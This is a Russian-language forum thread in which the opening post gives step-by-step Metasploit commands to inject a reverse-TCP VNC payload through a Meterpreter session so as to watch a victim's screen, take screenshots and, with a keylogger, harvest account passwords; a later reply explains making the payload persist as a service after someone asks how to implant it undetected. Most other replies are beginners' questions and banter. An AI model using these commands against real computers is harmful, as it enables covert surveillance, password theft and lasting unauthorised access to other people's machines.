 |
07.09.2016, 15:41
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:
Virtual Network Computing ( VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB ( Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.
Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.
Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.
Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,
(с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:
> use windows/manage/payload_inject
> set payload windows/vncinject/reverse_tcp
> set LHOST 192.168.0.18 (IP атакуещего )
> set session 2 (Номер вашей сессии с привилегиями )
> set handler true
> exploit
Убеждаемся, что все идет успешно:
В результате этих действий будет открыто окно VNC – сервера:
На этом все, вопросы и пожелания жду в комментариях. |
|
|
07.09.2016, 19:38
|
|
Новичок
Регистрация: 29.02.2016
Сообщений: 0
С нами:
5370865
Репутация:
0
|
|
збс, лес как у меня на обоях
|
|
|
|
07.09.2016, 23:01
|
|
Новичок
Регистрация: 29.02.2016
Сообщений: 0
С нами:
5370865
Репутация:
0
|
|
IronBird сказал(а):
Так может это и твой стол?)
точно спалился
|
|
|
|
23.09.2016, 07:59
|
|
Новичок
Регистрация: 14.08.2015
Сообщений: 0
С нами:
5656404
Репутация:
0
|
|
Алёша сказал(а):
кто нибудь знает как беспалевно вживить payload на постоянно?
Алексей, здравствуйте. Тема форума Этичный хакинг и тестирование на проникновение.
|
|
|
|
01.10.2016, 20:53
|
|
Новичок
Регистрация: 30.09.2016
Сообщений: 0
С нами:
5061452
Репутация:
0
|
|
Алёша сказал(а):
кто нибудь знает как беспалевно вживить payload на постоянно?
В отрытой сессии пейлоада:
Пропишет нагрузку как сервис.
Справка:
OPTIONS:
-A Automatically start a matching multi/handler to connect to the service
-h This help menu
-r Uninstall an existing Meterpreter service (files must be deleted manually)
|
|
|
|
25.03.2017, 11:31
|
|
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами:
4963406
Репутация:
0
|
|
OmeN сказал(а):
я не понял .. куда вводить эти команды ? в терменал Кали ? ввожу use windows/manage/payload_inject - пишет bash: use: command not found . И как открыть сессию meterpreter с повышенными привилегиями ?
Это надо вводить в msf консоль
сначало msfconsole запускаем.
|
|
|
|
26.03.2017, 09:04
|
|
Новичок
Регистрация: 25.03.2017
Сообщений: 0
С нами:
4808708
Репутация:
0
|
|
Вопрос нуба: ip атакующего это ip жертвы?(вряд ли) если нет, то какие данные жертвы? просто не понял, какая из команд отвечает за ввод данных жертвы?
|
|
|
|
26.03.2017, 09:35
|
|
Новичок
Регистрация: 25.03.2017
Сообщений: 0
С нами:
4808708
Репутация:
0
|
|
DSW сказал(а):
set LHOSTip атакующего это твой ip например 192.168.1.100
ip жертвы это тот кого собираешься атаковать например 1.1.1.1
Какая команда указывает жертву?
|
|
|
|
26.03.2017, 10:14
|
|
Новичок
Регистрация: 25.03.2017
Сообщений: 0
С нами:
4808708
Репутация:
0
|
|
DSW сказал(а):
Я тут молец ступил,полуается что set LHOST 192.168.0.18 это тот кого атакуем
Спс. Ip серый или белый?
|
|
|
|
01.04.2017, 20:20
|
|
Новичок
Регистрация: 13.03.2017
Сообщений: 0
С нами:
4825198
Репутация:
0
|
|
Ну что я могу сказать . Статья стоит своего Хозяина , а хозяин статьи молодец )
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
